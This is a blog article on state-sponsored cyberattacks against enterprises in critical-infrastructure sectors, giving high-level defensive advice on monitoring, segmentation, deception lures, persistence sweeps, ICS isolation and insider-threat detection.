By Al Hartmann

State-Sponsored Attacks Against Enterprises

Is My Enterprise Targeted?

According to the 2018 Verizon Data Breach Investigations Report, state-affiliated or nation-state attackers comprised 14.5% of observed external attack activity. While this is less than a quarter of the organized crime attack activity, state-sponsored attacks can be devastatingly effective, far reaching, consequential, and stubbornly persistent. Also, statistics may be deceiving, since criminal attacks will likely be discovered as they become monetized, whereas a state-sponsored attack may employ great stealth, avoiding observable impacts, and simply lie in wait as a contingency against future cyber war.

The Department of Homeland Security’s sixteen critical infrastructure sectors are a target list for state-sponsored attackers. If your enterprise falls into one of these sectors, then you are a nation-state target, and if your enterprise is prominent within its sector, then you are a priority target.

Chemical Sector Financial Services Sector
Commercial Facilities Sector Food and Agriculture Sector
Communications Sector Government Facilities Sector
Critical Manufacturing Sector Healthcare and Public Health Sector
Dams Sector Information Technology Sector
Defense Industrial Base Sector Nuclear Reactors, Materials, and Waste Sector
Emergency Services Sector Transportation Systems Sector
Energy Sector Water and Wastewater Systems Sector

How Are State-Sponsored Attacks Different?

Compared to cybercriminal attacks, state-sponsored attacks differ in objectives, in scope, and in capabilities:

  • In objectives, espionage value and critical infrastructure penetration will outweigh monetization (excepting North Korea at times).
  • In scope, nation-state attackers will strive to extend their penetration footholds very broadly, organizationally and geographically, as well as temporally, seeking a permanent dynamically evolving stealth presence.
  • In capabilities, nation-state attackers possess a potent arsenal, including highly skilled cyber teams that can penetrate any cyber defenses, signals intelligence teams that can tap any network or surveil any target, supply chain compromise teams that can backdoor enterprise software and hardware systems (as Snowden revealed), as well as traditional covert methods and the means to turn human intelligence sources within your enterprise.

But also keep in mind that some intelligence services cultivate their nation’s cybercriminal organizations, or allegedly even their cybersecurity organizations, to facilitate nation-state objectives, so be alert to this murky interloping.

What Is the Impact to My Security Strategy?

Targeted enterprises will be under continual attack by multiple state-sponsored agencies, which will likely place them in a state of continual compromise, demanding strong threat hunting capabilities across the cyber, signals, and human dimensions of attack operations. Just like a warship with watertight compartments to allow it to sustain hull breaches without sinking, you must deal resiliently with the attacks that evade your prevention safeguards.

  • Know your environment better than your opponents—networks, databases, systems, apps, users. This requires always-present, always-on monitoring across all networks, from both endpoint and network vantages, and across all systems-on-prem, in the cloud, or mobile. Critical situational awareness is imperative for your always vigilant threat hunters and responders.
  • Develop a strategic data defense plan, including layering, compartmentalization, and segmentation, so that the inevitable penetration events will not result in a catastrophic exfiltration of your entire data assets (i.e. where one hull breach sinks the ship).
  • Liberally employ deception lures to appeal to state-sponsored attackers’ espionage motivations and serve as attack tripwires. If the lures are realistic (not obvious decoys), they can allow your forensics teams to place the attackers under surveillance and study their TTP (with your always-on monitoring capabilities).
  • Attack attribution, while not essential, is useful for informing response teams with historic threat actor TTP, for better prioritizing response actions by characterizing attacker objectives, and for identifying knowledgeable sources and experienced responders engaged with that APT group. Short of that, even being able to just distinguish and track attack groups, with your own codenames, will be of great response value over the long term.
  • As part of your continual threat hunting, perform systematic sweeps for attacker persistence mechanisms. This includes autostart keys, scheduled tasks and chron jobs, stealth updaters, and potential deeply-embedded phone-home firmware in systems and devices. In a wireless world, radio frequency spectrum sweeps are a desirable precaution against state-sponsored attack capabilities (out-of-band persistence).
  • State-sponsored attackers will leverage significant background intelligence and reconnaissance on their attack targets, to craft highly credible phishes, target senior staff and executives, and achieve high-value endpoint penetrations. Focus additional security and monitoring resources and security awareness training on these likely targets and other privileged users. Provide all staff with ready access to safely sandboxed virtual environments for attachment inspection and link validation.
  • Sequester ICS and other OT assets from direct internet connection and establish strong firewall and gateway protections between your enterprise networks and your ICS networks. Continually re-validate the integrity of all ICS and OT firmware and software images against trusted sources, while remaining alert to supply chain compromise.
  • Establish secure communications channels with bilateral authentication and end-to-end encryption for sensitive communications internally and with strategic partners and correspondents. Codify transaction workflows to incorporate secure communications for key authorization and data transfer steps. Assume insecure channels are open to eavesdropping and message tampering and are transparent to state-sponsored attackers.
  • Adopt user and entity behavior analytics to both hunt for and prevent insider attacks or impersonations. State-sponsored attackers can recruit insiders through bribery, persuasion, ideology, blackmail, or coercion (intelligence methods practiced for centuries), or they may simply plant bugs on their persons or in their devices. Outside security, custodial, food service, delivery, or service personnel can also be exploited and often have privileged physical access.
Get the General Here